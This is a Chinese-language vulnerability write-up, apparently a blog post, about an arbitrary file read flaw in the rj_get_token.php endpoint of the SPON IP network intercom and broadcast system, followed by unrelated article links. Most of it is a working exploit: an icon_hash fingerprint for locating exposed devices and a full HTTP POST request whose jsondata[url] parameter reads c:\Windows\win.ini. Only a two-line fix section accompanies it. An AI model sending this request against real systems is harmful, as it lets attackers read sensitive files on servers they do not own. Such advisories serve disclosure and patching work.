世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统rj_get_token.php存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件。

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

jsondata[url]=c:\Windows\win.ini

读取win.ini配置文件内容

修复建议

1、升级至最新安全版本。

2、限制接口访问。

相关推荐
上海云盾商务经理杨杨2 分钟前
2025年高防IP与游戏盾深度对比:如何选择最佳防护方案?
网络协议·tcp/ip·安全·web安全·游戏
不愧是你呀15 分钟前
深度剖析并发I/O模型select、poll、epoll与IOCP核心机制
linux·服务器·网络·windows
Think Spatial 空间思维24 分钟前
【安全攻防与漏洞】HTTPS中的常见攻击与防御
网络协议·安全·https·漏洞·攻防·防御
hgdlip1 小时前
手机IP地址更换的影响与操作指南
网络·tcp/ip·智能手机
一米阳光zw1 小时前
mac将自己网络暴露到公网
网络·macos·php
0xCC说逆向1 小时前
Windows逆向工程提升之IMAGE_EXPORT_DIRECTORY
开发语言·数据结构·windows·安全·网络安全·pe结构·逆向工程
网硕互联的小客服1 小时前
如何排查服务器 CPU 温度过高的问题并解决?
linux·运维·服务器·网络·安全
茉莉玫瑰花茶2 小时前
HTTP 协议详解
网络·网络协议·http
瀚高PG实验室2 小时前
网络抓包命令tcpdump及分析工具wireshark使用
网络·wireshark·tcpdump·瀚高数据库
100分题库小程序3 小时前
港口危货储存单位主要安全管理人员考试题
经验分享·笔记·安全